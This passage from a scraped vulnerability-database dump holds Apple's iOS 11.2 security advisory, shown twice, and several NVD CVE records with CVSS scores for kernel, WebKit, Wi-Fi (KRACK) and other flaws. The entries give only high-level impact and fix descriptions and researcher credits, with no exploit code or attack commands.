Zero\n\nEntry updated January 10, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOMobileFrameBuffer**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13879: Apple\n\nEntry updated October 24, 2018\n\n**IOSurface**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Incorrect certificate is used for encryption\n\nDescription: A S/MIME issue existed in the handling of encrypted email. This issue was addressed through improved selection of the encryption certificate.\n\nCVE-2017-13874: Nicolas Devillard\n\nEntry updated April 9, 2018\n\n**Mail Drafts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\n**Mail Message Framework**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)\n\nEntry added December 21, 2017\n\n**ReplayKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A user may not have control over their screen broadcast\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13888: Dan Niemeyer of Microsoft, Peter Pau (ArcanaArt.com)\n\nEntry added June 21, 2018, updated September 8, 2020\n\n**SafariViewController**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-13891: Janne Raiskila (@raiskila)\n\nEntry added June 21, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 13, 2017, updated May 4, 2018\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s, iPhone 6s Plus, iPhone 6, iPhone 6 Plus, iPhone SE, iPhone 5s, 12.9-inch iPad Pro 1st generation, iPad Air 2, iPad Air, iPad 5th generation, iPad mini 4, iPad mini 3, iPad mini 2, and iPod touch 6th generation \nReleased for iPhone 7 and later and iPad Pro 9.7-inch (early 2016) and later in [iOS 11.1](<https://support.apple.com/kb/HT208222>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-09-08T03:53:28", "title": "About the security content of iOS 11.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2411", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-7152", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-13888", "CVE-2017-13880", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-13891", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-13847", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-13874", "CVE-2017-13867", "CVE-2017-13879", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13905", "CVE-2017-13885", "CVE-2017-13862", "CVE-2017-7164"], "modified": "2020-09-08T03:53:28", "id": "APPLE:HT208334", "href": "https://support.apple.com/kb/HT208334", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T04:14:47", "description": "# About the security content of iOS 11.2\n\nThis document describes the security content of iOS 11.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## iOS 11.2\n\nReleased December 2, 2017\n\n**App Store**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**Calculator**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to alter currency conversion rates\n\nDescription: Exchange rates were retrieved from HTTP rather than HTTPS. This was addressed by enabling HTTPS for exchange rates.\n\nCVE-2017-2411: Richard Shupak (linkedin.com/in/rshupak), Seth Vargo (@sethvargo) of Google, and an anonymous researcher\n\nEntry added May 2, 2018, updated June 14, 2018\n\n**CFNetwork Session**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\nEntry updated January 10, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOMobileFrameBuffer**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13879: Apple\n\nEntry updated October 24, 2018\n\n**IOSurface**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Incorrect certificate is used for encryption\n\nDescription: A S/MIME issue existed in the handling of encrypted email. This issue was addressed through improved selection of the encryption certificate.\n\nCVE-2017-13874: Nicolas Devillard\n\nEntry updated April 9, 2018\n\n**Mail Drafts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\n**Mail Message Framework**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)\n\nEntry added December 21, 2017\n\n**ReplayKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A user may not have control over their screen broadcast\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13888: Dan Niemeyer of Microsoft, Peter Pau (ArcanaArt.com)\n\nEntry added June 21, 2018, updated September 8, 2020\n\n**SafariViewController**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-13891: Janne Raiskila (@raiskila)\n\nEntry added June 21, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 13, 2017, updated May 4, 2018\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s, iPhone 6s Plus, iPhone 6, iPhone 6 Plus, iPhone SE, iPhone 5s, 12.9-inch iPad Pro 1st generation, iPad Air 2, iPad Air, iPad 5th generation, iPad mini 4, iPad mini 3, iPad mini 2, and iPod touch 6th generation \nReleased for iPhone 7 and later and iPad Pro 9.7-inch (early 2016) and later in [iOS 11.1](<https://support.apple.com/kb/HT208222>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: September 08, 2020\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-02T00:00:00", "type": "apple", "title": "About the security content of iOS 11.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13860", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13874", "CVE-2017-13876", "CVE-2017-13879", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13888", "CVE-2017-13891", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-2411", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7152", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-02T00:00:00", "id": "APPLE:3CD8680715FC8DF4A758CC6012471868", "href": "https://support.apple.com/kb/HT208334", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:23:12", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13862", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13862"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13862", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13862", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T13:22:03", "description": "An issue was discovered in certain Apple products. iOS before 11.1 is affected. The issue involves the \"Messages\" component. It allows physically proximate attackers to view arbitrary photos via a Reply With Message action in the lock-screen state.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 2.4, "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-11-13T03:29:00", "type": "cve", "title": "CVE-2017-13844", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13844"], "modified": "2019-04-29T16:30:00", "cpe": [], "id": "CVE-2017-13844", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13844", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T13:23:30", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13868", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13868"], "modified": "2019-03-22T19:36:00", "cpe": [], "id": "CVE-2017-13868", "href": 